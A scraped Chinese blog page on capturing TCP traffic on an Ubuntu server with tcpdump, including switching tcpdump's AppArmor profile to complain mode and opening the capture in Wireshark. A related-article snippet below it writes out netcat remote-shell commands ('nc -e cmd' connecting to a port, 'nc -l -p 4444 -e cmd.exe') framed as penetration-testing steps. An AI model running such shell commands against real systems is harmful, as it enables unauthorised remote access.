Ubuntu服务器如何抓包/Linux应该都适用

最新推荐文章于 2024-01-01 23:25:11 发布
最新推荐文章于 2024-01-01 23:25:11 发布
阅读量2.8k 收藏 3
点赞数
分类专栏: 日常总结 服务器 文章标签: Ubuntu服务器抓包
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrLi_IT/article/details/84201862
版权

1、首先输入  tcpdump -X -s 0 -i 2 -w(如果想写到文件中,必须有-w,之后控制台并不会显示) captcha.cap(自动生成到同当前文件夹统计目录中) host xxx.xxx.xxx.xxx(自己的服务器ip) and tcp(按自己需求来我需要抓tcp包) port 8080(需要监控的端口)

    tcpdump是Linux系统中抓包工具

    Ctrl + c是退出键

2、如果在输入1中的命令时,出现Permission denied,那么输入grep tcpdump /sys/kernel/security/apparmor/profiles

    查看你得tcpdump命令是什么模式

    如果是/usr/sbin/tcpdump (enforce)

    输入aa-complain /usr/sbin/tcpdump,将模式改为complain

    当你想换回来那么可以输入aa-enforce /usr/sbin/tcpdump,改回来

    如果还是报无权限的错误,执行下面的步骤

3、输入命令apt install apparmor-utils 或者用apt-get apparmor-utils

    如果在这报错

    

    就是说你的脚本有问题,比如我的两个

    insserv: warning: script 'tomcat' missing LSB tags and overrides

    insserv: warning: script 'tomcat8' missing LSB tags and overrides

    那么进入你的两个脚本文件中

    /etc/init.d/tomcat

    在上方添加如下代码

    ### BEGIN INIT INFO

    # Provides: bbzhh.com

    # Required-Start: $local_fs $network

    # Required-Stop: $local_fs

    # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6

    # Short-Description: tomcat service

    # Description: tomcat service daemon

    ### END INIT INFO

    

4、然后继续执行第三步开头代码

5、如果成功,那么就可以执行第二步

    aa-complain /usr/sbin/tcpdump,更改tcpdump模式

6、然后既可以返回执行第一步,抓包

7、如果还是不能用,那么直接输入apt-get remove insserv,慎用,博主也没有用过

8、最后成功输入是下面的图片样式 

    同级目录下会出现一个文件

    

    如果你想解析captcha.cap文件,你可以下载wireshark解析

    https://www.wireshark.org/#download

9、选择下载可以使用的版本以后直接安装,将*.cap文件通过wireshark打开,然后就可以了

Linux抓包命令tcpdump使用技巧大全
网络技术联盟站
06-07 754
tcpdump是一个网络数据包分析工具,由Van Jacobson、Craig Leres和Steven McCanne在1988年开发。它是一个命令行工具,能够实时地捕获和显示通过网络接口传输的数据包。tcpdump基于libpcap库工作,libpcap是一个跨平台的C/C++库,用于捕获网络数据包。
nc传shell抓包-nc连接获取shell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-14 1041
nc传shell步骤1、渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量:客户端:nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端:nc -lvvp 4444 #监听4444端口2、nc传shell抓包,nc反向连接,防火墙阻挡外部流量: 服务端:nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略
[ubuntu]ubuntu下抓取网络包命令
martinkeith的博客
05-20 1870
host 210.27.48.3指明 210.27.48.3是一台主机 net202.0.0.0 指明202.0.0.0 是一个网络地址 port 23 指明端口23。第二种确定传输方向的关键字,主要包括 src,dst,dst or src,dst and src。这些关键字指明了传输的方向。没有指明方向关键字,则缺省是src or dst.第一种类型的关键字:host net port。第三种是协议的关键字,主要包括ip,arp,udp,tcp,fddi。
ubuntu下如何使用wireshark抓包,保姆级教程
热门推荐
振华OPPO的博客世界
02-17 1万+
Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
Ubuntu下进行网络抓包
weixin_34128501的博客
12-09 560
下面是在Ubuntu中进行网络抓包的教程。 1.安装wireshark 终端运行:sudo apt-get install wireshark 2.修改init.lua 直接运行wireshark的话会报错: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:45: dofile...
ubuntu抓包
weixin_33749242的博客
04-22 283
笔记本安装了ubuntu 14.04, 利用笔记本的网卡进行抓包时,需要将网卡配置为monitor模式。 (1)关闭无线网卡    sudo ifconfig wlan0 down (2)将无线网卡配置为monitor 模式 sudo iwconfig wlan0 mode monitor (3)启动无线网卡 sudo ifco...
ubuntu 抓包工具 wireshark
beimuaihui的专栏
08-01 3148
http开发过程中,有一个重要的工具就是获取http表头,smart sniff,以及firefox的插件live http header都可以完成。UBUNTU自带wireshark,感觉不错
linux如何过滤端口抓包,linux系统下怎样使用tcpdump进行抓包
weixin_42701915的博客
05-01 1783
本篇文章主要讲述了tcpdump抓包案例,具有一定参考价值,感兴趣的朋友快来学习一下吧!1.常见参数tcpdump -i eth0 -nn -s0 -v port 80-i 选择监控的网卡-nn 不解析主机名和端口号,捕获大量数据,名称解析会降低解析速度-s0 捕获长度无限制-v 增加输出中显示的详细信息量port 80 端口过滤器,只捕获80端口的流量,通常是HTTP2.tcpdump -...
linux服务器抓包
jack__love的博客
07-29 473
查看linux服务器网络数据发送和接收状态 tcpdump -i eth0 -w duan.pcap sz duan.pcap 到桌面 用wireshark打开即可
ubuntu下使用burpsuite移动设备抓包.docx
10-30
Ubuntu 下使用 BurpSuite 进行移动设备抓包 BurpSuite 简介 BurpSuite 是一款功能强大且广泛应用于 Web 应用程序安全测试的抓包工具。它可以帮助测试人员和安全研究员对 Web 应用程序进行深入的安全测试和分析。...
ubuntu下常用的抓包软件_ubuntu使用抓包工具,charles
weixin_42237496的博客
01-17 3661
wget -q -O - https://www.charlesproxy.com/packages/apt/PublicKey | sudo apt-key addsudo sh -c 'echo deb https://www.charlesproxy.com/packages/apt/ charles-proxy main > /etc/apt/sources.list.d/charl...
ubuntu抓包工具tcpdump使用详解
绝圣弃智-零的博客
03-06 7178
简介 用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通...
Ubuntu下的命令行抓包工具tcpdump
小饼仙子的专栏
05-15 1万+
今天在一哥们的Ubuntu虚拟机上装wireshark怎么都搞不定,只好把这个命令行的东西再拿出来了…… ----- Ubuntu默认是安装好了tcpdump工具的,如果没有安装的话使用sudo apt-get install tcpdump即可下载安装。 (如果遇到tcpdump: no suitable device found的问题,检查一下是不是在用root权限运行tcpdump,t
无线空中包抓包教程:使用vmware虚拟机的ubuntu系统,通过tcpdump抓取无线空中包
最新发布
szqy00的博客
01-01 2446
在实际抓取空中包的过程中,对应网卡的windows驱动往往不支持抓包(或者只能购买购物网站上的性能不大行的所谓windows专用抓包工具,其实这从底层上看是不合理的,就算找客服问,他们往往也无法准确回答),而这种抓包的方式在linux系统上更容易开发,也更容易使用(甚至原生就支持),所以本文介绍如何通过ubuntu系统抓包。1、一般情况下,一个ubuntulinux系统具有市面上卖的大多数无线网卡的对应驱动,只不过需要注意的是,并不是全部都有,而且有些就算有驱动,也有可能不支持抓取空中包。
ubuntu 发包和抓包工具的使用
锅锅的博客
09-04 4799
一、介绍 发包工具:packEth 抓包工具:wireshark tcpdump 二、安装 1、安装packEth sudo apt-get install packeth 安装wireshark sudo apt install wireshark 安装tcpdump 二、使用 1、发包 ping命令 sudo packeth L2 Link layer,填写源和目的MAC地址,选择IPv4 L3 IPv4 data,填写源和目的IP地址,选择ICMP协议 L4 ICMP data,Type选择Ec
Linux —— 如何抓包
看了就会暴富的博客!
03-25 210
问题 如何在Linux系统上进行抓包? 解决 使用tcpdump命令
Linux命令行抓包及包解析工具tshark(wireshark)使用实例解析.txt
10-31
### Linux命令行抓包及包解析工具tshark(wireshark)使用实例解析 #### 知识点一:tshark与Wireshark的关系及其安装 - **tshark与Wireshark的关系**: - tshark是Wireshark的一部分,主要用于命令行下进行网络...
wireshark抓包
zhuziwan的博客
06-30 365
wireshark抓包
linux实现网络抓包,Ubuntu下使用wireshark进行网络抓包
weixin_29752191的博客
05-04 542
下面是在Ubuntu中进行网络抓包的教程。1.安装wireshark终端运行:sudo apt-get install wireshark2.修改init.lua直接运行wireshark的话会报错:Lua: Error during loading:[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled要对其进行...
ubuntu下常用的抓包软件_ubuntu下安装wireshark(抓包工具)
weixin_32145807的博客
01-17 545
安装编译工具:$sudo apt-get install build-essential为了成功编译Wireshark,您需要安装GTK+的开发文件和GLib库(libraries)。$sudo apt-get install libgtk2.0-dev libglib2.0-dev安装Checkinstall以便管理您系统中直接由源代码编译安装的软件。$sudo apt-get install ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值